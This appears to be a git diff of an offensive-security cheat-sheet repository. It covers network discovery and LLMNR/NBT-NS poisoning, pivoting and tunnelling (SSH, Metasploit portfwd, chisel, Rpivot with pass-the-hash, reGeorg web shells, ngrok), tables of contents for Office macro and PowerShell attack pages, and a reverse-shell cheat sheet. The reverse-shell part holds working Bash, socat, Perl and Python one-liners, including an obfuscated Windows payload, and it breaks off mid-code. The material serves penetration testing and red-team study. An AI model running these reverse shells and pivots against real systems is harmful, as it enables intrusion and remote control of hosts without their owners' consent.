 > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
 ## Netdiscover
 ```powershell
 netdiscover -i eth0 -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 20 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 876
 _____________________________________________________________________________
 IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.AA    68:AA:AA:AA:AA:AA     15     630  Sagemcom
 192.168.1.XX    52:XX:XX:XX:XX:XX      1      60  Unknown vendor
 192.168.1.YY    24:YY:YY:YY:YY:YY      1      60  QNAP Systems, Inc.
 192.168.1.ZZ    b8:ZZ:ZZ:ZZ:ZZ:ZZ      3     126  HUAWEI TECHNOLOGIES CO.,LTD  
 ```
 ## Responder
 ```powershell
 responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
 responder.py -I eth0 -wrf
 ```
 Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
 ## Bettercap
 ```powershell
 bettercap -X --proxy --proxy-https -T <target IP>
 # better cap in spoofing, discovery, sniffer
 # intercepting http and https requests,
 # targetting specific IP only
 ```
 ## References
 * [TODO](TODO)
--- a/Resources/Network
+++ b/Resources/Network
@@ -1,261 +1,29 @@
 # Network Pivoting Techniques
-## Summary
+:warning: Content of this page has been moved to [InternalAllTheThings/redteam/pivoting/network-pivoting-techniques](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/)
-
+
-* [Windows netsh Port Forwarding](#windows-netsh-port-forwarding)
+* [SOCKS Compatibility Table](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-compatibility-table)
-* [SSH](#ssh)
+* [Windows netsh Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#windows-netsh-port-forwarding)
-  * [SOCKS Proxy](#socks-proxy)
+* [SSH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ssh)
-  * [Local Port Forwarding](#local-port-forwarding)
+  * [SOCKS Proxy](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-proxy)
-  * [Remote Port Forwarding](#remote-port-forwarding)
+  * [Local Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#local-port-forwarding)
-* [Proxychains](#proxychains)
+  * [Remote Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#remote-port-forwarding)
-* [Web SOCKS - reGeorg](#web-socks---regeorg)
+* [Proxychains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#proxychains)
-* [Metasploit](#metasploit)
+* [Graftcp](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#graftcp)
-* [sshuttle](#sshuttle)
+* [Web SOCKS - reGeorg](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---regeorg)
-* [chisel](#chisel)
+* [Web SOCKS - pivotnacci](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---pivotnacci)
-* [Rpivot](#rpivot)
+* [Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#metasploit)
-* [plink](#plink)
+* [sshuttle](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sshuttle)
-* [ngrok](#ngrok)
+* [chisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#chisel)
-* [Basic Pivoting Types](#basic-pivoting-types)
+  * [SharpChisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sharpchisel)
-  * [Listen - Listen](#listen---listen)
+* [gost](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#gost)
-  * [Listen - Connect](#listen---connect)
+* [Rpivot](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#rpivot)
-  * [Connect - Connect](#connect---connect)
+* [RevSocks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#revsocks)
-* [References](#references)
+* [plink](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#plink)
-
+* [ngrok](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ngrok)
-## Windows netsh Port Forwarding
+* [Capture a network trace with builtin tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#capture-a-network-trace-with-builtin-tools)
-
+* [Basic Pivoting Types](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#basic-pivoting-types)
-```powershell
+  * [Listen - Listen](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---listen)
-netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
+  * [Listen - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---connect)
-
+  * [Connect - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#connect---connect)
-netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
+* [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#references)
 ```
 1. listenaddress – is a local IP address waiting for a connection.
 2. listenport – local listening TCP port (the connection is waited on it).
 3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
 4. connectport – is a TCP port to which the connection from listenport is forwarded to.
 ## SSH
 ### SOCKS Proxy
 ```bash
 ssh -D8080 [user]@[host]
 ssh -N -f -D 9000 [user]@[host]
 -f : ssh in background
 -N : do not execute a remote command
 ```
 Cool Tip : Konami SSH Port forwarding
 ```bash
 [ENTER] + [~C]
 -D 1090
 ```
 ### Local Port Forwarding
 ```bash
 ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
 ```
 ### Remote Port Forwarding
 ```bash
 ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
 ssh -R 3389:10.1.1.224:3389 root@10.11.0.32
 ```
 ## Proxychains
 **Config file**: /etc/proxychains.conf
 ```bash
 [ProxyList]
 socks4 localhost 8080
 ```
 Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
 ## Web SOCKS - reGeorg
 [reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
 Drop one of the following files on the server:
 - tunnel.ashx
 - tunnel.aspx
 - tunnel.js
 - tunnel.jsp
 - tunnel.nosocket.php
 - tunnel.php
 - tunnel.tomcat.5.jsp
 ```python
 python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080
 optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]
 ```
 ## Metasploit
 ```powershell
 # Meterpreter list active port forwards
 portfwd list 
 # Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
 portfwd add –l 3389 –p 3389 –r target-host 
 portfwd add -l 88 -p 88 -r 127.0.0.1
 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
 # Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
 portfwd delete –l 3389 –p 3389 –r target-host 
 # Meterpreter delete all port forwards
 portfwd flush 
 or
 # Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
 run autoroute -s 192.168.15.0/24 
 use auxiliary/server/socks4a
 # Meterpreter list all active routes
 run autoroute -p 
 route #Meterpreter view available networks the compromised host can access
 # Meterpreter add route for 192.168.14.0/24 via Session number.
 route add 192.168.14.0 255.255.255.0 3 
 # Meterpreter delete route for 192.168.14.0/24 via Session number.
 route delete 192.168.14.0 255.255.255.0 3 
 # Meterpreter delete all routes
 route flush 
 ```
 ## sshuttle
 Transparent proxy server that works as a poor man's VPN. Forwards over ssh. 
 * Doesn't require admin. 
 * Works with Linux and MacOS.
 * Supports DNS tunneling.
 ```powershell
 pacman -Sy sshuttle
 apt-get install sshuttle
 sshuttle -vvr user@10.10.10.10 10.1.1.0/24
 sshuttle -vvr username@pivot_host 10.2.2.0/24 
 ```
 ## chisel
 ```powershell
 go get -v github.com/jpillora/chisel
 # forward port 389 and 88 to hacker computer
 user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 
 user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
 ```
 ## Rpivot
 Server (Attacker box)
 ```python
 python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
 ```
 Client (Compromised box)
 ```python
 python client.py --server-ip <ip> --server-port 9443
 ```
 Through corporate proxy
 ```python
 python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
 --ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
 ```
 Passing the hash
 ```python
 python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
 --ntlm-proxy-port 8080 --domain CORP --username jdoe \
 --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
 ```
 ## plink
 ```powershell
 plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389    --> exposes the RDP port of the machine in the port 3390 of the SSH Server
 plink -l root -pw mypassword 192.168.18.84 -R
 plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445
 plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
 ```
 ## ngrok
 ```powershell
 # get the binary
 wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
 unzip ngrok-stable-linux-amd64.zip 
 # log into the service
 ./ngrok authtoken 3U[REDACTED_TOKEN]Hm
 # deploy a port forwarding for 4433
 ./ngrok http 4433
 ./ngrok tcp 4433
 ```
 ## Basic Pivoting Types
 | Type              | Use Case                                    |
 | :-------------    | :------------------------------------------ |
 | Listen - Listen   | Exposed asset, may not want to connect out. |
 | Listen - Connect  | Normal redirect.                            |
 | Connect - Connect | Can’t bind, so connect to bridge two hosts  |
 ### Listen - Listen
 | Type              | Use Case                                    |
 | :-------------    | :------------------------------------------ |
 | ncat              | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`|
 | socat             | `socat -v tcp-listen:8080 tcp-listen:9090`  |
 | remote host 1     | `ncat localhost 8080 < file`                |
 | remote host 2     | `ncat localhost 9090 > newfile`             |
 ### Listen - Connect
 | Type              | Use Case                                                        |
 | :-------------    | :------------------------------------------                     |
 | ncat              | `ncat -l -v -p 8080 -c "ncat localhost 9090"`                   |
 | socat             | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` |
 | remote host 1     | `ncat localhost -p 8080 < file`                                 |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                     |
 ### Connect - Connect
 | Type              | Use Case                                                                   |
 | :-------------    | :------------------------------------------                                |
 | ncat              | `ncat localhost 8080 -c "ncat localhost 9090"`                             |
 | socat             | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` |
 | remote host 1     | `ncat -l -p 8080 < file                                                    |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                                |
 ## References
 * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
 * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
 * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
 * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
 * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
--- a/Resources/Office
+++ b/Resources/Office
@@ -0,0 +1,37 @@
 # Office - Attacks 
 :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/office-attacks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/)
 * [Office Products Features](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#office-products-features)
 * [Office Default Passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#office-default-passwords)
 * [Office Macro execute WinAPI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#office-macro-execute-winapi)
 * [Excel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#excel)
    * [XLSM - Hot Manchego](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlsm---hot-manchego)
    * [XLS - Macrome](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xls---macrome)
    * [XLM Excel 4.0 - SharpShooter](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlm-excel-40---sharpshooter)
    * [XLM Excel 4.0 - EXCELntDonut](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlm-excel-40---excelntdonut)
    * [XLM Excel 4.0 - EXEC](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlm-excel-40---exec)
    * [SLK - EXEC](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#slk---exec)
 * [Word](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#word)
    * [DOCM - Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---metasploit)
    * [DOCM - Download and Execute](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---download-and-execute)
    * [DOCM - Macro Creator](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---macro-creator)
    * [DOCM - C# converted to Office VBA macro](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---c-converted-to-office-vba-macro)
    * [DOCM - VBA Wscript](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---vba-wscript)
    * [DOCM - VBA Shell Execute Comment](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---vba-shell-execute-comment)
    * [DOCM - VBA Spawning via svchost.exe using Scheduled Task](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---vba-spawning-via-svchostexe-using-scheduled-task)
    * [DCOM - WMI COM functions (VBA AMSI)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---wmi-com-functions)
    * [DOCM - winmgmts](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---winmgmts)
    * [DOCM - Macro Pack - Macro and DDE](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docmxlm---macro-pack---macro-and-dde)
    * [DOCM - BadAssMacros](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---badassmacros)
    * [DOCM - CACTUSTORCH VBA Module](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---cactustorch-vba-module)
    * [DOCM - MMG with Custom DL + Exec](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---mmg-with-custom-dl--exec)
    * [VBA Obfuscation](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba-obfuscation)
    * [VBA Purging](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba-purging)
        * [OfficePurge](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#officepurge)
        * [EvilClippy](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#evilclippy)
    * [VBA AMSI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba-amsi)
    * [VBA - Offensive Security Template](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba---offensive-security-template)
    * [DOCX - Template Injection](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docx---template-injection)
    * [DOCX - DDE](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docx---dde)
 * [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#references)
--- a/Resources/Powershell
+++ b/Resources/Powershell
@@ -0,0 +1,17 @@
 # Powershell
 :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/powershell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/)
 - [Execution Policy](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#execution-policy)
 - [Encoded Commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#encoded-commands)
 - [Constrained Mode](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#constrained-mode)
 - [Encoded Commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#encoded-commands)
 - [Download file](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#download-file)
 - [Load Powershell scripts](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#load-powershell-scripts)
 - [Load Chttps://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/# assembly reflectively](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#load-c-assembly-reflectively)
 - [Call Win API using delegate functions with Reflection](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#call-win-api-using-delegate-functions-with-reflection)
  - [Resolve address functions](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#resolve-address-functions)
  - [DelegateType Reflection](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#delegatetype-reflection)
  - [Example with a simple shellcode runner](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#example-with-a-simple-shellcode-runner)
 - [Secure String to Plaintext](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#secure-string-to-plaintext)
 - [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#references)
--- a/Resources/Reverse
+++ b/Resources/Reverse
@@ -1,347 +1,43 @@
 # Reverse Shell Cheat Sheet
-## Summary
+:warning: Content of this page has been moved to [InternalAllTheThings/cheatsheet/shell-reverse](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/)
-
+
-* [Reverse Shell](#reverse-shell)
+* [Tools](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#tools)
-    * [Bash TCP](#bash-tcp)
+* [Reverse Shell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#reverse-shell)
-    * [Bash UDP](#bash-udp)
+    * [Awk](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#awk)
-    * [Socat](#socat)
+    * [Automatic Reverse Shell Generator](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#revshells)
-    * [Perl](#perl)
+    * [Bash TCP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#bash-tcp)
-    * [Python](#python)
+    * [Bash UDP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#bash-udp)
-    * [PHP](#php)
+    * [C](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#c)
-    * [Ruby](#ruby)
+    * [Dart](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#dart)
-    * [Golang](#golang)
+    * [Golang](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#golang)
-    * [Netcat Traditional](#netcat-traditional)
+    * [Groovy Alternative 1](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#groovy-alternative-1)
-    * [Netcat OpenBsd](#netcat-openbsd)
+    * [Groovy](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#groovy)
-    * [Ncat](#ncat)
+    * [Java Alternative 1](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#java-alternative-1)
-    * [OpenSSL](#openssl)
+    * [Java Alternative 2](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#java-alternative-2)
-    * [Powershell](#powershell)
+    * [Java](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#java)
-    * [Awk](#awk)
+    * [Lua](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#lua)
-    * [Java](#java)
+    * [Ncat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#ncat)
-    * [War](#war)
+    * [Netcat OpenBsd](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#netcat-openbsd)
-    * [Lua](#lua)
+    * [Netcat BusyBox](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#netcat-busybox)
-    * [NodeJS](#nodejs)
+    * [Netcat Traditional](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#netcat-traditional)
-    * [Groovy](#groovy)
+    * [NodeJS](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#nodejs)
-* [Meterpreter Shell](#meterpreter-shell)
+    * [OGNL](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#ognl)
-    * [Windows Staged reverse TCP](#windows-staged-reverse-tcp)
+    * [OpenSSL](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#openssl)
-    * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp)
+    * [Perl](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#perl)
-    * [Linux Staged reverse TCP](#linux-staged-reverse-tcp)
+    * [PHP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#php)
-    * [Linux Stageless reverse TCP](#linux-stageless-reverse-tcp)
+    * [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#powershell)
-    * [Other platforms](#other-platforms)
+    * [Python](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#python)
-* [Spawn TTY Shell](#spawn-tty-shell)
+    * [Ruby](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#ruby)
-* [References](#references)
+    * [Rust](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#rust)
-
+    * [Socat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#socat)
-## Reverse Shell
+    * [Telnet](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#telnet)
-
+    * [War](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#war)
-### Bash TCP
+* [Meterpreter Shell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#meterpreter-shell)
-
+    * [Windows Staged reverse TCP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#windows-staged-reverse-tcp)
-```bash
+    * [Windows Stageless reverse TCP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#windows-stageless-reverse-tcp)
-bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
+    * [Linux Staged reverse TCP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#linux-staged-reverse-tcp)
-
+    * [Linux Stageless reverse TCP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#linux-stageless-reverse-tcp)
-0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
+    * [Other platforms](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#other-platforms)
-```
+* [Spawn TTY Shell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#spawn-tty-shell)
-
+* [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#references)
 ### Bash UDP
 ```bash
 Victim:
 sh -i >& /dev/udp/127.0.0.1/4242 0>&1
 Listener:
 nc -u -lvp 4242
 ```
 ### Socat
 ```powershell
 user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4242
 ```
 Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)
 ### Perl
 ```perl
 perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 NOTE: Windows only
 perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 ```
 ### Python
 Linux only
 IPv4
 ```python
 export RHOST="10.10.10.10";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
 ```
 IPv4
 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
 ```
 IPv6
 ```python
 python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 
 ```
 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 ```
 Windows only
 ```powershell
 C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.10.10.10', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in 